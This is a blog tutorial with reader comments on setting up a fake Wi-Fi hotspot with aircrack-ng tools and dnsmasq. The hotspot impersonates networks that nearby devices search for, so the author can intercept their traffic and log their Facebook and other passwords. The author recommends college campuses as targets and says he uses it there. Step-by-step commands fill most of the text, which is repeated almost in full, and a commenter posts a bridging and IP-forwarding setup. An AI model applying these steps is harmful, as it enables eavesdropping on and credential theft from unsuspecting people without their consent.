Well ..today after a long time I am writing an tutorial .. I had even bought www.achutetech.com and for a year but I didn't post any thing there so it just got lapsed , I am sorry for not keeping up..but now I am trying to continue this blog by posting about the tings that I am trying these days...
Lets cut the crap .. and start of with our hacking .. :D
What are we doing today ?
Today we will create a fake wifi hotspot so that clients may connect to it and we can see what they are up to even log their facebook , or any web service passwords if they happen to browse them on our hotspot.
Where can we use this ?
Well you can use it any where where there are lots of wifi users around i.e laptops , smart phones .. who have their wifi on and are searching for wifi networks. I would recommend places like college campus .. well I use them there :D
Um... So What the tech behind it ?
You will act as a valid wifi hotspot provider .. Providing free Internet access to everyone :) . Those who connect to it you will monitor all their data and then forward it to the real server you will be acting like a man in the middle.
Intercepting every data , Even changing them to suit your needs and forwarding them to the real server and forwarding the replies back to the client.
[CLIENT] <-------------> [ YOU ] <------------> [INTERNET] ------------>------------->
What are the tools required ?
I use Linux and I suggest you should also , So I will be using Kali Linux . Its a Linux Distribution with all the tools required for hacking are usually pre installed .
Software Required
If you have Kali Linux or even Backtrack or any distribution which has aircrack-ng suite of tools then you are good .. Else you need to install it from here - http://www.aircrack-ng.org/ or you can start your terminal / console and type
NOTE: even kali and backtrack users I suggest you use dnsmasq [instead of dhcpserver3 or dhcpd ]and install it once again even if its already installed.
Next you need to have dnsmasq to get it type
Setting Up
First we need to gather some information ..plug in your usb wifi adapter if you have one and in terminal / console type
ifconfig
You should see something like this on your screen
There you will see wlan0 or even wlan1 [If you have extra wifi adapter ] . Take a note of what you have and then type
airmon-ng start wlan0
or
airmon-ng start wlan1
depending on what you have You should be able to see (monitor mode enabled on mon0)
Now thats done .. lets proceed ..
Next we need to monitor the airwaves to get the names of the wifi access point the clients are trying to connect to do that type
airodumpn-ng mon0
You should be able to see a few clients and under probe you will find the name of the Access Point the client is trying to connect to in this example we see that the client is searching for the wifi access point named achutetech
So we will create a Fake Ap with the name of achutetech and try to make the client connect to us . To do this we type ..
airbase-ng --essid achutetech mon0
In our example we see this
That we have successfully managed to create a fake AP and a client with an client also was successfully associated with our fake AP. But the client will still not be fully connected to our AP since we haven't provided it with any IP address . To do so we use dnsmasq
Note : I have tried using dhcpd or dnsserver3 but they seem to be error prone while configuring them and it was getting errors like Interface name is too long and all so I switched to dnsmasq and it seems to work great :D
To verify that we have dnsmasq type
and to see whether we have the configuration file or not [I have noticed that even tough dnsmasq was installed on Kali Os it didnt have the dnsmasq.conf file so to get it type apt-get install dnsmasq ]
and to verify that we have the config file type
if dnsmasq.conf file is returned then its well and good But if not try
Ok now we have the dnsmasq we need to configure a few things type
[How to use vim - I will be writing a quick tutorial on it soon ]
now scroll down to line 90 or around you should see
# interface=
change it to
interface=at0
// at0 is the interface in which our FAKE AP lies
now scroll down even more to line 141 you should see
#dhcp-range=192.168.0.50,192.168.0.150,12h
just remove the #
and you are good to go :D
Now we have to supply an ip address to your router [i.e the fake ap ]
to do so type
and to start the dhcp service type
Now your clients should be able to get an ip address for themselves.
We have Finished the configuration part for now .. The Fun Part will be in the next post :D
The Part two is ready - here is the link
MITM - WIFI Honeypot part 2
If you have any problems till now do comment below I will try my best to reply thanks ..
Lets cut the crap .. and start of with our hacking .. :D
What are we doing today ?
Today we will create a fake wifi hotspot so that clients may connect to it and we can see what they are up to even log their facebook , or any web service passwords if they happen to browse them on our hotspot.
Where can we use this ?
Well you can use it any where where there are lots of wifi users around i.e laptops , smart phones .. who have their wifi on and are searching for wifi networks. I would recommend places like college campus .. well I use them there :D
Um... So What the tech behind it ?
You will act as a valid wifi hotspot provider .. Providing free Internet access to everyone :) . Those who connect to it you will monitor all their data and then forward it to the real server you will be acting like a man in the middle.
Intercepting every data , Even changing them to suit your needs and forwarding them to the real server and forwarding the replies back to the client.
[CLIENT] <-------------> [ YOU ] <------------> [INTERNET] ------------>------------->
What are the tools required ?
I use Linux and I suggest you should also , So I will be using Kali Linux . Its a Linux Distribution with all the tools required for hacking are usually pre installed .
- Linux OS
- Wifi Adapter which supports creating hosted network
- Internet Connection
- a little bit of Patience
- And this site of course, to guide you ;)
Software Required
If you have Kali Linux or even Backtrack or any distribution which has aircrack-ng suite of tools then you are good .. Else you need to install it from here - http://www.aircrack-ng.org/ or you can start your terminal / console and type
apt-get update
apt-get install aircrack-ng
NOTE: even kali and backtrack users I suggest you use dnsmasq [instead of dhcpserver3 or dhcpd ]and install it once again even if its already installed.
Next you need to have dnsmasq to get it type
apt-get install dnsmasqNow you are ready .. Lets start ..
Setting Up
First we need to gather some information ..plug in your usb wifi adapter if you have one and in terminal / console type
ifconfig
You should see something like this on your screen
There you will see wlan0 or even wlan1 [If you have extra wifi adapter ] . Take a note of what you have and then type
airmon-ng start wlan0
or
airmon-ng start wlan1
depending on what you have You should be able to see (monitor mode enabled on mon0)
Now thats done .. lets proceed ..
Next we need to monitor the airwaves to get the names of the wifi access point the clients are trying to connect to do that type
airodumpn-ng mon0
You should be able to see a few clients and under probe you will find the name of the Access Point the client is trying to connect to in this example we see that the client is searching for the wifi access point named achutetech
So we will create a Fake Ap with the name of achutetech and try to make the client connect to us . To do this we type ..
airbase-ng --essid achutetech mon0
In our example we see this
That we have successfully managed to create a fake AP and a client with an client also was successfully associated with our fake AP. But the client will still not be fully connected to our AP since we haven't provided it with any IP address . To do so we use dnsmasq
Note : I have tried using dhcpd or dnsserver3 but they seem to be error prone while configuring them and it was getting errors like Interface name is too long and all so I switched to dnsmasq and it seems to work great :D
To verify that we have dnsmasq type
whereis dnsmasq
and to see whether we have the configuration file or not [I have noticed that even tough dnsmasq was installed on Kali Os it didnt have the dnsmasq.conf file so to get it type apt-get install dnsmasq ]
and to verify that we have the config file type
ls /etc/ | grep dnsmasq
if dnsmasq.conf file is returned then its well and good But if not try
apt-get install dnsmasq
Ok now we have the dnsmasq we need to configure a few things type
vim /etc/dnsmasq.conf
[How to use vim - I will be writing a quick tutorial on it soon ]
now scroll down to line 90 or around you should see
# interface=
change it to
interface=at0
// at0 is the interface in which our FAKE AP lies
now scroll down even more to line 141 you should see
#dhcp-range=192.168.0.50,192.168.0.150,12h
just remove the #
and you are good to go :D
Now we have to supply an ip address to your router [i.e the fake ap ]
to do so type
ifconfig at0 192.168.0.1 up
and to start the dhcp service type
dnsmasq
Now your clients should be able to get an ip address for themselves.
We have Finished the configuration part for now .. The Fun Part will be in the next post :D
The Part two is ready - here is the link
MITM - WIFI Honeypot part 2
If you have any problems till now do comment below I will try my best to reply thanks ..
Help!
ReplyDeleteI have got a problem.
It says failed to bind dhcp server socket. Already in use
i get the access point started but when i try to connect to it they are not getting any ip addresses. don't know what wrong..... need help figuring this out
ReplyDeletehelp ! i get the access point started but clients aren't assigned any ip addresses. when i try to use the browser on the associated machine it says no internet connection
ReplyDelete@Angchung .. That means other service is using the same port , my best guess restart your laptop and try once more , If the problem persists , i will try to solve it in my laptop and let u know..
ReplyDelete@Kemp Ross , If the other devices are not getting ip address that means something is wrong with the DHCP server . Please read the above mentioned steps , to configure the dnsmasq , If it still fails , I will be happy to guide you.
ReplyDeletehow to share the internet connection (from eth0, wlan1/0, pppoe0) to at0 ? is no use if the victim doesn't get internet connecting to our fake ap. (i did read the part 2)
ReplyDeleteYes in order to do that we need to bridge the interfaces using the " brctl " command .
DeleteIts is generally not available in Kali linux so you need to install it using
" apt-get install bridge-utils "
try to search for the brctl command in google .. If you arent able to do it, I will try to recreate the scenario in my own laptop and let you know.
My devices dont get an IP. The .config is as you described. And it looks like the server is starting. Iw bin trying to make a rouge AP for almost a week now, and your guide is by far the easyest and most self explaining. But please help me and the others with the IP problem.
ReplyDeleteMy devices dont get an IP. The .config is as you described. And it looks like the server is starting. Iw bin trying to make a rouge AP for almost a week now, and your guide is by far the easyest and most self explaining. But please help me and the others with the IP problem.
ReplyDeleteThis is another method I dont get to work, can annyone see what im doing wrong?
ReplyDelete$ ifconfig
#My internet is coming from wlan1 "inet addr:192.168.0.104 Bcast:192.168.0.255 Mask:255.255.255.0"
$ airmon-ng start wlan0
$ airbase-ng --essid "FakeAP" mon0
######This far everything is OK, I can se the "FakeAP" from other computers. But I need to asign IP`s.
#Verfiy details of logical access point interface
$ ifconfig at0
at0 Link encap:Ethernet HWaddr 10:08:b1:1e:be:b7
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
#Create a bridge interface (To chek Iw briged at0 to wlan1 (internett) and wlan0 (mon0))
$ brctl addbr myBridge
#Now, associate real interfaces (wlan1 and at0) to bridge interfaces
#I needed to run this command to make it work: $ iw dev wlan1 set 4addr on
$ brctl addif myBridge wlan1
$ brctl addif myBridge at0
#Verfiy details of new bridge interface
$ brctl show
#bridge name bridge id STP enabled interfaces
#myBridge 8000.1008b11ebeb7 no at0
wlan1
######Looks like wlan1 (internett) and at ("FakeAP"?) are connected.
#Remove the IP address of wlan1 and at0 interfaces
$ ifconfig wlan1 0.0.0.0 up
$ ifconfig at0 0.0.0.0 up
#Assign IP address to bridge interface we have created earlier. You can use your old wlan0 IP address or assign any IP free address on your network
$ ifconfig myBridge 192.168.0.104/8 up
$ ifconfig myBridge
myBridge Link encap:Ethernet HWaddr 10:08:b1:1e:be:b7
inet addr:192.168.0.104 Bcast:192.255.255.255 Mask:255.0.0.0
inet6 addr: fe80::1208:b1ff:fe1e:beb7/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:648 (648.0 B)
######It looks like my bride has an assigned IP. The One From wlan1
#Enable IP forwarding on your computer. In other word, your computer will work as a router. IT will perform NATing.
$ echo 1 > /proc/sys/net/ipv4/ip_forward
######Try to restart "FakeAP"
$ airbase-ng --essid "FakeAP" mon0
16:06:20 Created tap interface at0
16:06:20 Trying to set MTU on at0 to 1500
16:06:20 Access Point with BSSID 10:08:B1:1E:BE:B7 started.
Error: Got channel -1, expected a value > 0.
16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
16:06:26 Client 00:E3:B2:C2:3B:F0 associated (unencrypted) to ESSID: "FakeAP"
######And the latest lines just repeats itselves, and the computer trying to connect with dont get an IP. WHat am I doing wrong.